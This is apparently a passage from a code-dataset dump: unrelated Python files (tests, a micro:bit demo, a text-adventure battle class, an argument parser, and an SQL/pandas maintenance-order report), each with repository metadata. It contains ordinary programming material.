self.leniencies = leniencies
self.ids = ids
self.sample_size = len(linearities)
self.PerformCalculations()
def PerformCalculations(self):
self.min_leniency = min(self.leniencies)
self.max_leniency = max(self.leniencies)
self.normalized_leniencies = list(map(lambda x: self.normalize(x, self.min_leniency, self.max_leniency), self.leniencies))
self.min_linearity = min(self.linearities)
self.max_linearity = max(self.linearities)
self.normalized_linearities = list(map(lambda x: self.normalize(x, self.min_linearity, self.max_linearity), self.linearities))
self.average_linearity = sum(self.linearities)/len(self.linearities)
self.average_leniency = sum(self.leniencies)/len(self.leniencies)
self.average_point = (self.average_linearity, self.average_leniency)
self.normalized_average_point = (self.normalize(self.average_linearity, self.min_linearity, self.max_linearity), self.normalize(self.average_leniency, self.min_leniency, self.max_leniency))
self.std_linearity = np.std(self.linearities)
self.std_leniency = np.std(self.leniencies)
def normalize(self, x, min, max):
return (x - min) / (max - min)
def __str__(self):
return f'<name: {self.run_name}, sample_size: {len(self.ids)}, average linearity: {round(self.average_linearity, 2)}, average leniency: {round(self.average_leniency, 2)}>'
def __repr__(self):
return str(self)
def print_random_samples_of_maps(run, num):
random_sample = random.sample(run.ids, num)
for sample in random_sample:
print((sample, run.normalized_linearities[sample], run.normalized_leniencies[sample], run.linearities[sample], run.leniencies[sample]))
def find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight):
firstLevel = min(id_list1, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
secondLevel = min(id_list2, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
return (firstLevel, secondLevel)
filename = f'example_generator_config.txt'
run_names = []
number_of_maps_to_randomly_sample = 0
with open(filename) as f:
name_of_everything = f.readline().rstrip('\n')
number_of_maps_to_randomly_sample = int(f.readline())
run_name = f.readline()
while run_name != "":
run_names.append(run_name.rstrip('\n'))
run_name = f.readline()
print(run_names)
number_of_runs = len(run_names)
runs = []
for i in range(len(run_names)):
run_name = run_names[i]
run_file_name = f'{run_name}/data.txt'
with open(run_file_name) as f:
display_name = f.readline()
ids = []
leniencies = []
linearities = []
id = f.readline()
while id != "":
ids.append(int(id))
leniency = f.readline().rstrip('\n').replace(',',".")
leniencies.append(float(leniency))
linearity = f.readline().rstrip('\n').replace(',',".")
linearities.append(float(linearity))
id = f.readline()
runs.append(Run(display_name, linearities, leniencies, ids))
normalized_id_lists = []
for run in runs:
normalized_id_lists.append(list(zip(run.ids, run.normalized_linearities, run.normalized_leniencies, run.linearities, run.leniencies)))
print_random_samples_of_maps(runs[0], number_of_maps_to_randomly_sample)
print("Enter normalized linearity")
normalized_linearity = float(input())
print("Enter normalized leniency")
normalized_leniency = float(input())
print("How weighted should linearity be?")
linearity_weight = float(input())
print("Which runs to get it from")
print("Run nmbr 1")
run_number_1 = int(input())
print("Run nmbr 2")
run_number_2 = int(input())
id_list1 = normalized_id_lists[run_number_1]
id_list2 = normalized_id_lists[run_number_2]
print(find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight))
| 36.536585
| 198
| 0.715398
| 1,660
| 0.369381
| 0
| 0
| 0
| 0
| 0
| 0
| 390
| 0.086782
|
afcbed072ad157da39a96ed8b309d2b6f0eb45c5
| 781
|
py
|
Python
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 1
|
2018-11-01T02:58:35.000Z
|
2018-11-01T02:58:35.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 13
|
2019-03-13T13:21:42.000Z
|
2020-05-27T21:55:40.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 2
|
2019-08-01T07:01:31.000Z
|
2021-12-20T05:09:02.000Z
|
from datetime import datetime
from pyetheroll.utils import EtherollUtils, timestamp2datetime
class TestEtherollUtils:
def test_compute_profit(self):
bet_size = 0.10
chances_win = 34
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout == 0.19
bet_size = 0.10
# chances of winning must be less than 100%
chances_win = 100
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout is None
class TestUtils:
def test_timestamp2datetime(self):
assert timestamp2datetime("1566645978") == (
datetime(2019, 8, 24, 11, 26, 18)
)
assert timestamp2datetime("0x5d611eda") == (
datetime(2019, 8, 24, 11, 26, 18)
)
| 28.925926
| 68
| 0.644046
| 681
| 0.871959
| 0
| 0
| 0
| 0
| 0
| 0
| 67
| 0.085787
|
afcd6032574bba34bea8e6fbfd6741b9fd4aa205
| 270
|
py
|
Python
|
micropython/002_plot_test.py
|
mirontoli/tolle-rasp
|
020638e86c167aedd7b556d8515a3adef70724af
|
[
"MIT"
] | 2
|
2021-06-29T17:18:09.000Z
|
2022-01-25T08:29:59.000Z
|
micropython/002_plot_test.py
|
mirontoli/tolle-rasp
|
020638e86c167aedd7b556d8515a3adef70724af
|
[
"MIT"
] | null | null | null |
micropython/002_plot_test.py
|
mirontoli/tolle-rasp
|
020638e86c167aedd7b556d8515a3adef70724af
|
[
"MIT"
] | null | null | null |
# https://codewith.mu/en/tutorials/1.0/microbit
from microbit import *
flag = True
while True:
sleep(100)
if button_a.was_pressed():
flag = not flag
if flag:
print((accelerometer.get_x(),))
else:
print(accelerometer.get_values())
| 22.5
| 47
| 0.637037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 47
| 0.174074
|
afcecca0aaa83b41a9ff96c5213253a69fa739e1
| 153
|
py
|
Python
|
osbot_aws/helpers/Fargate_Cluster.py
|
artem7902/OSBot-AWS
|
4b676b8323f18d3d9809d41263f3a71745ec2828
|
[
"Apache-2.0"
] | null | null | null |
osbot_aws/helpers/Fargate_Cluster.py
|
artem7902/OSBot-AWS
|
4b676b8323f18d3d9809d41263f3a71745ec2828
|
[
"Apache-2.0"
] | null | null | null |
osbot_aws/helpers/Fargate_Cluster.py
|
artem7902/OSBot-AWS
|
4b676b8323f18d3d9809d41263f3a71745ec2828
|
[
"Apache-2.0"
] | null | null | null |
from osbot_aws.apis.Fargate import Fargate
class Fargate_Cluster(Fargate):
def __init__(self, account_id):
super().__init__(account_id)
| 15.3
| 42
| 0.732026
| 105
| 0.686275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
afceefa6ab42fdff336bb5e178d3b569a6751ee3
| 7,156
|
py
|
Python
|
adventxtend.py
|
Textovortex/AdventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 1
|
2021-04-16T12:04:56.000Z
|
2021-04-16T12:04:56.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 2
|
2021-04-16T16:16:47.000Z
|
2021-04-18T01:19:06.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | null | null | null |
'''
________ ________ ___ ___ _______ ________ _________ ___ ___ _________ _______ ________ ________
|\ __ \|\ ___ \|\ \ / /|\ ___ \ |\ ___ \|\___ ___\|\ \ / /|\___ ___\\ ___ \ |\ ___ \|\ ___ \
\ \ \|\ \ \ \_|\ \ \ \ / / | \ __/|\ \ \\ \ \|___ \ \_|\ \ \/ / ||___ \ \_\ \ __/|\ \ \\ \ \ \ \_|\ \
\ \ __ \ \ \ \\ \ \ \/ / / \ \ \_|/_\ \ \\ \ \ \ \ \ \ \ / / \ \ \ \ \ \_|/_\ \ \\ \ \ \ \ \\ \
\ \ \ \ \ \ \_\\ \ \ / / \ \ \_|\ \ \ \\ \ \ \ \ \ / \/ \ \ \ \ \ \_|\ \ \ \\ \ \ \ \_\\ \
\ \__\ \__\ \_______\ \__/ / \ \_______\ \__\\ \__\ \ \__\/ /\ \ \ \__\ \ \_______\ \__\\ \__\ \_______\
\|__|\|__|\|_______|\|__|/ \|_______|\|__| \|__| \|__/__/ /\ __\ \|__| \|_______|\|__| \|__|\|_______|
|__|/ \|__|
By | |_|_| /\_|_._ _ o.__|_ _
|_|_| |/--\|_|_||_)(_)|| ||_(_)\/\/
_/ _/ _/ _/ _/ _/ _/_/_/ _/_/_/_/_/
_/ _/_/_/ _/_/ _/_/_/ _/_/_/ _/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/ _/ _/_/ _/_/ _/_/ _/ _/
_/ _/ _/ _/_/_/_/ _/ _/ _/_/ _/_/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/_/ _/ _/ _/ _/ _/
_/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
_/ _/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/_/_/ _/
'''
try: from adventurelib import Item, say, Bag # importing dependencies
except: from adstrangerlib import Item, say, Bag
from random import choice, randint
import time
__version__ = "0.0.3"
class Character(Item):
'''
The character.'''
def __init__(self, name, desc, hp, dp, powers=None, exp=None):
'''
The character. Do NOT use the variable "character"'''
self.name = name
self.desc = desc
self.hp = hp
self.dp = dp
self.powers = powers
self.exp = exp
self.list = Bag()
class Player(Character):
'''
The player class extends the character.
'''
def __init__(self, name, hp, dp_range, powers=None, exp=None, lvl=None):
self.name = name
self.hp = hp
self.dp = dp_range
self.powers = powers
self.exp = exp
self.lvl = lvl
class Battle():
def __init__(self, lose_msg, win_msg, character_, player_, reset_func,
death_msg="You Died.",
vict_msg="You Won!",
prompt ="Enter a power >",
unknown_power="Choose a valid power"):
'''
lose_msg = messages when the player loses; is a list
win_msg = when the player wins; is a list
character_ = the character the player battles; is a Character object
player_ = the player variable; is a Player object
reset_func = function to reset your game if the player loses the battle.; is a function
'''
self.lose_msg = lose_msg
self.win_msg = win_msg
self.character = character_
self.character_save = character_
self.player = player_
self.reset_func = reset_func
self.death_msg = death_msg
self.vict_msg = vict_msg
self.prompt = prompt
self.unk_power = unknown_power
def start(self):
global player
'''
Starts the battle
'''
self.finished = False # the battle is not finished
while not self.finished:
if self.player.hp <= 0:
say(self.death_msg) # RIP you
self.reset_func() # run the reset function, as it is going to
self.finished = True
self.character.hp = self.character_save.hp
break
elif self.character.hp <= 0: # Oh, yay, now do I have to beat that troll over there?
say(self.vict_msg)
self.finished = True
self.character.hp = self.character_save.hp
break
say(f"You have {self.player.hp} \u2665")
time.sleep(0.5)
#message = choice(choice([self.win_msg, self.lose_msg])) # generate a random message
say(f"You are fighting the {self.character.name}") # yes, I do need to know when I am fighting the
#response = input(f"\u2665 {self.player.hp}\nChoose a power > ")
#if response in self.player.powers:
# say(f'You {response} the {self.character.name}')
# self.character.hp -= self.player.dp
# say(f"The {self.character.name} has now {self.character.hp} health points")
# say(message)
# if message in self.win_msg:
# self.player.hp += self.character.dp
# self.player.hp -= self.character.dp
# say(f"The {self.character.name} fights you back and you lose {self.character.dp} HP")
#else:
# say("Choose a valid power") # yeah, do you really expect me?
self.fighter = choice([self.player, self.character])
time.sleep(0.5)
if self.fighter is self.player:
for power in self.player.powers:
say(f"You have the power to {power}")
time.sleep(0.3)
power = input(self.prompt)
if power in self.player.powers:
self.character.hp -= randint(self.player.dp[0],self.player.dp[1])
say(choice(self.win_msg))
else:
say(self.unk_power)
else:
self.player.hp -= self.character.dp
time.sleep(1)
say(choice(self.lose_msg))
time.sleep(1)
say(f"The {self.character.name} has {self.character.hp} \u2665")
| 50.394366
| 237
| 0.396311
| 4,238
| 0.59223
| 0
| 0
| 0
| 0
| 0
| 0
| 4,325
| 0.604388
|
afceffc0fa04029d539709b408be0aca115cbc14
| 415
|
py
|
Python
|
student.py
|
gabrielmccoll/python-learning
|
253dcf9df647dbdcaaeac498c962db39868d6604
|
[
"MIT"
] | null | null | null |
student.py
|
gabrielmccoll/python-learning
|
253dcf9df647dbdcaaeac498c962db39868d6604
|
[
"MIT"
] | null | null | null |
student.py
|
gabrielmccoll/python-learning
|
253dcf9df647dbdcaaeac498c962db39868d6604
|
[
"MIT"
] | null | null | null |
students = []
class Student:
school_name = "Springfield Elementary"
#pass #tells the interpreter just to do nothing
def __init__(self,name, student_id=332):
self.name = name
self.student_id = student_id
students.append(self)
def __str__(self):
return "Student " + self.name
def get_name_capitalize(self):
return self.name.capitalize()
def get_school_name(self):
return self.school_name
| 21.842105
| 48
| 0.73253
| 400
| 0.963855
| 0
| 0
| 0
| 0
| 0
| 0
| 81
| 0.195181
|
afcf06799a4c681aefacbbab3bd0c395c6f657a8
| 700
|
py
|
Python
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 1
|
2019-01-26T14:53:36.000Z
|
2019-01-26T14:53:36.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 3
|
2018-08-05T14:53:55.000Z
|
2019-01-27T11:15:45.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | null | null | null |
from ampy.pyboard import Pyboard
from ampy.files import Files
from .files import led_panel_client, max7219
from os.path import basename
from sys import argv
def put():
"""
Uploads all necessary files to the pyboard.
"""
if len(argv) < 2:
print("Pyboard COM port not specified. Usage: led_panel_client_put /dev/tty.wchusbserial1410")
exit(1)
pyboard_pyboard = Pyboard(argv[1])
pyboard_files = Files(pyboard_pyboard)
files_to_put = led_panel_client() | max7219()
for file_path in files_to_put:
name = basename(file_path)
with open(file_path) as file_object:
data = file_object.read()
pyboard_files.put(name, data)
| 28
| 102
| 0.687143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 146
| 0.208571
|
afcfa558f77ea2152e94c0d489367f3ae1bc234b
| 3,241
|
py
|
Python
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:18.000Z
|
2022-01-30T18:29:30.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 1
|
2021-10-17T20:08:41.000Z
|
2021-10-17T20:08:41.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:20.000Z
|
2021-09-01T00:07:14.000Z
|
'''
Into to deep learning Koopman operators
===
Author: Nicholas Geneva (MIT Liscense)
url: https://nicholasgeneva.com/blog/
github: https://github.com/NickGeneva/blog-code
===
'''
import numpy as np
import random
import argparse
import os, errno, copy, json
import torch
class Parser(argparse.ArgumentParser):
def __init__(self):
super(Parser, self).__init__(description='Read')
self.add_argument('--exp-dir', type=str, default="./koopman", help='directory to save experiments')
self.add_argument('--exp-name', type=str, default="duffing", help='experiment name')
self.add_argument('--model', type=str, default="fcnn", choices=['fcnn'], help='experiment name')
# data
self.add_argument('--ntrain', type=int, default=200, help="number of training data")
self.add_argument('--ntest', type=int, default=5, help="number of training data")
self.add_argument('--stride', type=int, default=10, help="number of time-steps as encoder input")
self.add_argument('--batch-size', type=int, default=16, help='batch size for training')
# training
self.add_argument('--epoch-start', type=int, default=0, help='epoch to start at, will load pre-trained network')
self.add_argument('--epochs', type=int, default=300, help='number of epochs to train')
self.add_argument('--lr', type=float, default=0.001, help='ADAM learning rate')
self.add_argument('--seed', type=int, default=12345, help='manual seed used in PyTorch and Numpy')
# logging
self.add_argument('--plot-freq', type=int, default=25, help='how many epochs to wait before plotting test output')
self.add_argument('--test-freq', type=int, default=5, help='how many epochs to test the model')
self.add_argument('--ckpt-freq', type=int, default=5, help='how many epochs to wait before saving model')
self.add_argument('--notes', type=str, default='')
def mkdirs(self, *directories):
'''
Makes a directory if it does not exist
'''
for directory in list(directories):
try:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def parse(self, dirs=True):
'''
Parse program arguements
Args:
dirs (boolean): True to make file directories for predictions and models
'''
args = self.parse_args()
args.run_dir = args.exp_dir + '/' + '{}'.format(args.exp_name) \
+ '/{}_ntrain{}_batch{}_{}'.format(args.model, args.ntrain, args.batch_size, args.notes)
args.ckpt_dir = args.run_dir + '/checkpoints'
args.pred_dir = args.run_dir + "/predictions"
if(dirs):
self.mkdirs(args.run_dir, args.ckpt_dir, args.pred_dir)
# Set random seed
if args.seed is None:
args.seed = random.randint(1, 10000)
random.seed(args.seed)
torch.manual_seed(args.seed)
np.random.seed(seed=args.seed)
if dirs:
with open(args.run_dir + "/args.json", 'w') as args_file:
json.dump(vars(args), args_file, indent=4)
return args
| 41.551282
| 122
| 0.624499
| 2,967
| 0.915458
| 0
| 0
| 0
| 0
| 0
| 0
| 1,156
| 0.35668
|
afcfa7df8b6551e0c9178682429e9831edd629a5
| 1,767
|
py
|
Python
|
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | null | null | null |
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | 7
|
2020-02-18T17:12:31.000Z
|
2020-09-24T07:19:04.000Z
|
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | null | null | null |
"""
This test checks the input file generation of a basic job using a python UDF.
"""
import os
from eodc_openeo_bindings.job_writer.basic_writer import BasicJobWriter
def test_basic_python_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_python.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_python',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_python_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
def test_basic_r_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_r.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_r',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_r_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
| 39.266667
| 131
| 0.739106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 238
| 0.134692
|
afd07ae84271209f560ab1e8af1cb6cd4f30c6a7
| 336
|
py
|
Python
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 10
|
2018-09-05T15:20:05.000Z
|
2020-06-01T03:57:08.000Z
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | null | null | null |
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 7
|
2019-06-19T05:44:23.000Z
|
2020-08-30T07:26:13.000Z
|
import socket as sock
import os
IP = sock.gethostname()
CCTV_PORT = 9000
ANDR_PORT = 8000
CUR_DIR = os.getcwd()
REC_DIR = os.path.join(CUR_DIR, "record")
DB_ADDR = "Database server address"
PUSH_ADDR = "Push notification server address"
REG_ID = "Registration ID"
NOTIF_COUNT = 4
QUEUE_SIZE = 30
REC_FILE_NUM = 60
NOTIF_MINIUTE = 10
| 18.666667
| 46
| 0.752976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.25
|
afd20fab82d3922fc99876b2d016b1c0bd247c6a
| 7,878
|
py
|
Python
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | 2
|
2021-06-08T21:48:56.000Z
|
2021-09-08T02:11:07.000Z
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 27 14:14:47 2019
@author: DK0086
"""
import odema as od
import numpy as np
from datetime import datetime
import pandas as pd
import geopy.distance
import math
import os
import time
import sys
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent="Dash")
#######################################################################
# 1em Partie :
# Connection a Database des ordre D3 et traitement des donnees
tec=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
sql = "SELECT MVW_BW_AVIS.AVIS, MVW_BW_AVIS.DESCRIPTION, MVW_BW_AVIS.TYP, MVW_BW_AVIS.DATE_AVIS, \
MVW_BW_AVIS.ANNEE_DATE_AVIS, MVW_BW_AVIS.MOIS_DATE_AVIS, MVW_BW_AVIS.STATSYS, MVW_BW_AVIS.STAT_UTIL, \
MVW_BW_AVIS.ORDRE, MVW_BW_ORDRES.DATE_CREATION, MVW_BW_AVIS.POSTETECHNIQUE, MVW_BW_AVIS.CODAGE, \
MVW_BW_AVIS.DIV, MVW_BW_AVIS.RESPONSABLE FROM ODEMA.MVW_BW_AVIS MVW_BW_AVIS LEFT OUTER JOIN ODEMA.MVW_BW_ORDRES MVW_BW_ORDRES ON (MVW_BW_AVIS.ORDRE = MVW_BW_ORDRES.ORDRE)"
div=tec.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
localisation= tec.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
tec['longitude']=lon
tec['latitude']=lat
tec['Division']=divv
tec.index = tec['Division']
df = od.read_odema(sql=sql)
test = df[df['DIV'].isin(divv)].copy()
test['IPOT'] = test['STAT_UTIL'].fillna('').str.contains('IPOT')
test['ANOI'] = test['STAT_UTIL'].fillna('').str.contains('ANOI')
test['AINF'] = test['STAT_UTIL'].fillna('').str.contains('AINF')
test["TYP"] = np.where(test['TYP'] == "D3",
np.where(test['IPOT'],
"D3-IPOT",
np.where(test['AINF'],
'D3-AINF',
np.where(test['ANOI'],
'D3-ANOI',
"D3-AUTRE")
)
),
test['TYP'])
R5=['R01','R02','R03','R04','R05']
R10=['R06','R07','R08','R09','R10']
test['R5_et_moins']=test['CODAGE'].isin(R5)
test['R6_et_plus']=test['CODAGE'].isin(R10)
test = test[test['CODAGE'].isin(R5) | test['CODAGE'].isin(R10)]
test = test[test['TYP'].isin(['D2','D4','D9','D3']) | test['TYP'].str.contains('D3')]
test['TYPE_CODE']=test['TYP']
test["Technicien"] = test["DIV"].map(tec["Techniciens"]).fillna("non-assigne")
test["Désignation"] = test["DIV"].map(tec["Désignation"]).fillna("non-assigne")
test["Territoires"] = test["DIV"].map(tec["Territoires"]).fillna("non-assigne")
test["longitude"] = test["DIV"].map(tec["latitude"]).fillna("non-assigne")
test["latitude"] = test["DIV"].map(tec["longitude"]).fillna("non-assigne")
testcopy = test.copy()
df_ordres = testcopy[testcopy['ORDRE'].notnull()].copy()
testcopy["date"] = testcopy["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
testcopy=testcopy[(testcopy.date.dt.year>=2012)& (testcopy.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
testcopy["TYP"] = testcopy["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
testcopy = testcopy.append(df_ordres)
del testcopy["DATE_AVIS"], testcopy["DATE_CREATION"], testcopy['AINF'], testcopy['ANOI'], testcopy['IPOT'], testcopy['R5_et_moins'], testcopy['R6_et_plus']
test["TYP"] = np.where(test['R5_et_moins'],test['TYP']+"-R5",test['TYP']+"-R10")
df_ordres = test[test['ORDRE'].notnull()].copy()
test["date"] = test["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
test=test[(test.date.dt.year>=2012)& (test.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
test["TYP"] = test["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
test = test.append(df_ordres)
del test["DATE_AVIS"], test["DATE_CREATION"],test['AINF'], test['ANOI'], test['IPOT'], test['R5_et_moins'], test['R6_et_plus']
test = test.append(testcopy)
#######################################################################
# 2em Partie :
# Connection a Database des ordre 443 et traitement des donnees
sql_req_443 = \
"SELECT MVW_BW_ORDRES.TYPE, \
MVW_BW_ORDRES.CODE_NATURE, \
MVW_BW_ORDRES.ORDRE, \
MVW_BW_OPERATIONS_SM_PM.OPERATION_SM_PM, \
MVW_BW_ORDRES.DESIGNATION, \
MVW_BW_OPERATIONS_SM_PM.DESIGNATION_OPERATION_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUTS_UTIL_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUT_OP_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_CONF_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_LANC_SM_PM, \
MVW_BW_ORDRES.DIVISION_GRPE_GESTION, \
MVW_BW_ORDRES.DIVISION_POSTE_RESP, \
MVW_BW_ORDRES.POSTERESP \
FROM ODEMA.MVW_BW_ORDRES \
INNER JOIN ODEMA.MVW_BW_OPERATIONS_SM_PM \
ON (MVW_BW_ORDRES.ORDRE = MVW_BW_OPERATIONS_SM_PM.ORDRE_SM_PM) \
WHERE(MVW_BW_ORDRES.CODE_NATURE = '443')"
geolocator = Nominatim(user_agent="Dash")
df443 = od.read_odema(sql=sql_req_443)
df=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
div=df.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
df['Division']=divv
localisation= df.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
df['longitude']=lon
df['latitude']=lat
df.index = df['Division']
df443['chk'] = df443['DESIGNATION_OPERATION_SM_PM'].fillna('').str.lower().str.replace('é','e')
df443['TYPE_CODE'] = df443['TYPE'] + '-' + df443['CODE_NATURE']
df443['TYPE_CODE'] = np.where(df443['chk'].fillna("").str.contains('diagnostic')
,df443['TYPE_CODE'] + '-' + 'Diagnostic'
,df443['TYPE_CODE'] + '-' + 'Autre'
)
closed = df443[df443['DATE_STATUT_CONF_SM_PM'].notnull()].copy()
df443 = df443[df443['DATE_STATUT_LANC_SM_PM'].notnull()] #pas supposé d'avoir aucun null mais quand même, juste pour être sûr
closed['date'] = closed['DATE_STATUT_CONF_SM_PM']
df443['date'] = df443['DATE_STATUT_LANC_SM_PM']
lst_champs = ['TYPE_CODE','TYPE','CODE_NATURE','ORDRE','DESIGNATION','OPERATION_SM_PM','DESIGNATION_OPERATION_SM_PM','date', 'DIVISION_GRPE_GESTION','DIVISION_POSTE_RESP']
closed = closed[lst_champs]
df443 = df443[lst_champs]
df443['TYP'] = df443['TYPE_CODE'] + '-lances'
closed['TYP'] = closed['TYPE_CODE'] + '-confirmes'
df443 = df443.append(closed)
df443['DIV'] = df443['DIVISION_POSTE_RESP']
df443["Technicien"] = df443["DIV"].map(df["Techniciens"]).fillna("non-assigne")
df443["Désignation"] = df443["DIV"].map(df["Désignation"]).fillna("non-assigne")
df443["Territoires"] = df443["DIV"].map(df["Territoires"]).fillna("non-assigne")
df443["longitude"] = df443["DIV"].map(df["latitude"]).fillna("non-assigne")
df443["latitude"] = df443["DIV"].map(df["longitude"]).fillna("non-assigne")
df443["TYP_STATUS"] = df443["TYP"]
df443['433'] = df443['CODE_NATURE'].fillna('').str.contains('433')
del closed
#tot=pd.concat([df443, test], ignore_index=True)
#tot.to_csv('tot.csv',sep=";")
| 37.514286
| 180
| 0.621351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,700
| 0.469007
|
afd2843c7e52da7b669cdb447daf485dad48b407
| 4,398
|
py
|
Python
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 9
|
2019-05-29T12:53:03.000Z
|
